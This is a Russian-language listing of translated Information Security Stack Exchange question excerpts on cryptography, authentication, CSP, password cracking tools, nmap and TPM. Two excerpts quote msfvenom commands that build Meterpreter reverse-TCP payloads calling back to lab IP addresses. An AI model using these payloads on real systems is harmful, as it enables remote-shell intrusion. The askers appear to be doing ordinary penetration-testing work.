Информационная безопасность
Metasploit – ошибка неприменимого полезного груза msfvenom
00
Вопрос или проблема Я пытался сгенерировать полезную нагрузку с помощью msfvenom: msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.2.15 LPORT=1234 -f raw > shell.php У меня постоянно возникала эта ошибка: "ошибка: невозможно загрузить полезную нагрузку
Информационная безопасность
Как происходит получение sc_reduce в ed25519?
00
Вопрос или проблема Этот вопрос был перемещён из раздела Information Security Stack Exchange, потому что на него можно ответить в разделе Cryptography Stack Exchange. Перемещён 14 минут назад. Реализация ed25519 в supercop включает функцию под названием
Информационная безопасность
Офлайн рабочий процесс корневого центра сертификации (CA)
00
Вопрос или проблема Я ознакомился с несколькими обсуждениями здесь относительно управления оффлайн корневыми центрами сертификации (CA). Хотя они полезны, ни одно из них не совсем соответствует моему вопросу. Во-первых, это, предположительно, не будет оцениваться как ‘
Информационная безопасность
Как использовать PBKDF2 для получения ключа шифрования из пароля и затем получить доступ к этому ключу позже без пароля (т.е. с помощью куки)?
00
Вопрос или проблема Я разрабатываю приложение для ведения заметок, которое будет хранить заметки и файлы пользователей в зашифрованном виде в базе данных и на Backblaze соответственно. Приложение не будет иметь сквозного шифрования, но данные будут зашифрованы
Информационная безопасность
Сохранение информации о надежности паролей вместе с паролем
00
Вопрос или проблема Я работаю над системой аутентификации, которая использует пароли. Мне бы хотелось следовать современным рекомендациям NIST по поводу силы паролей. Тем не менее, мне также пришло в голову, что было бы неплохо хранить некоторые метаданные
Информационная безопасность
Что именно делает режим ‘одиночка’ в John the Ripper?
00
Вопрос или проблема Я тестирую John the Ripper (1.7.9 Jumbo 7) на файле, содержащем MD5-хэши без каких-либо имен пользователей. Я экспериментирую с различными правилами и конфигурациями – в данный момент я использую список слов и применяю команду --rules=single.
Информационная безопасность
Как я могу предотвратить форкание полезных нагрузок Python msfvenom без ручного декодирования полезной нагрузки?
00
Вопрос или проблема Я создаю полезную нагрузку на Python с помощью msfvenom, используя следующую команду: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=9090 -o stageless_payload.
Информационная безопасность
Чрезмерные входы в систему с контроллеров домена
00
Вопрос или проблема Я довольно нов в анализе журналов Windows. Я наблюдаю чрезмерное количество входов с кодами 4624 и 4625 с именем субъекта/учетной записи: DomainController (фактическое имя контроллера домена отличается) к учетным записям пользователей.
Информационная безопасность
Нарушение CSP ms-appx-web://
00
Вопрос или проблема У нас есть Java-приложение, которое позволяет пользователям загружать вложения и сохранять их на сервере. У приложения определена политика безопасности контента (CSP), которая выглядит следующим образом: base-uri 'self';
Информационная безопасность
Почему “не хранить ключи защиты данных” не является популярным выбором?
00
Вопрос или проблема В NIST SP 800-132 указаны два способа использования ключа защиты данных (DPK), который выводится из пароля. Один из них заключается в том, чтобы использовать DPK для шифрования данных, а затем, если я не ошибаюсь, уничтожить DPK.
Информационная безопасность
Неужели аутентификация JWT не требует куки?
00
Вопрос или проблема Я немного запутался. Каждый учебник, который я нашел о методе аутентификации JWT, упоминает, что токен, который создается, не должен действовать более 5 минут. Вот почему метод должен работать с куками (известными как refresh-token в JWT).
Информационная безопасность
Могу ли я создать WEP Wi-Fi и взломать его с помощью двух виртуальных машин?
00
Вопрос или проблема Я использую VirtualBox, Kali Linux в качестве атакующей виртуальной машины и Xubuntu в качестве предполагаемой точки доступа. Однако у меня есть только моя беспроводная PCIe карта на моем реальном ПК, и, похоже, создание виртуальной
Информационная безопасность
Сеть конфиденциальности Find My Device на Android
00
Вопрос или проблема Сегодня на моем Android-устройстве появилось сообщение о том, что оно присоединилось к новой сети «Найти устройство», которая позволяет двустороннее сканирование местоположений устройств по Bluetooth. Несмотря на заявления Google о
Информационная безопасность
Ubuntu Pro: Как работает процесс обновления?
00
Вопрос или проблема Этот вопрос был перемещён из раздела информационной безопасности Stack Exchange, так как на него можно ответить на Ask Ubuntu. Перемещён 20 минут назад. Ubuntu и его производные (например, Lubuntu) теперь имеют Pro-функцию (бесплатную
Информационная безопасность
Какой сайт принимает только TLS 1.2, чтобы я мог проверить возможности клиента?
00
Вопрос или проблема Существует ли общедоступный веб-сайт, который принимает только соединения TLS 1.2, чтобы я мог протестировать, может ли моё приложение успешно и безопасно подключиться к нему? Предыстория: У меня есть старое приложение на VB.
Информационная безопасность
ПК, управляемые через InTune – Должны обходить запрос UAC для тихой деинсталляции
00
Вопрос или проблема Я управляю набором ПК через Microsoft InTune, и предустановленное программное обеспечение (Firefox) должно быть удалено с этих ПК в соответствии с политикой компании. Я нашел способ выполнить тихую деинсталляцию (Firefox не показывает
Информационная безопасность
Может ли модель машинного обучения содержать вредоносный код?
00
Вопрос или проблема С ростом интереса к машинному обучению становится обычным делом для людей без опыта в области научных данных, таких как я, брать модели из таких источников, как HuggingFace, и запускать их. Теперь мое понимание моделей довольно ограниченно.
Информационная безопасность
Если на сайте есть заголовок ‘HTTP Content-Security-Policy require-sri-for’, охватывает ли это все вложенные скрипты?
00
Вопрос или проблема Если я использую целостность подресурсов (SRI) на веб-странице, и скрипт, который я импортирую, затем импортирует еще один скрипт, будет ли CSP ‘require-sri-for’ также включать эти последующие, вложенные, импортированные скрипты?
Информационная безопасность
NMAP – Прекратить/остановить сканирование при обнаружении открытого порта
00
Вопрос или проблема Существует ли команда в nmap или в каком-либо другом инструменте, которая остановит сканирование и перейдет к следующему IP, если будет найден хотя бы один открытый порт? Необходимо выполнить это для обнаружения хостов на нескольких
Информационная безопасность
Безопасно ли использовать не-PCR ключ после проверки работоспособности ключа PCR7 после запуска ОС на TPM 2.0?
00
Вопрос или проблема Итак, вопрос в следующем: если мы перезагрузим операционную систему и захотим подписать что-то, используя TPM. Допустим, мы хотим обеспечить безопасность загрузочной среды, используя криптоключ по политике PCR7.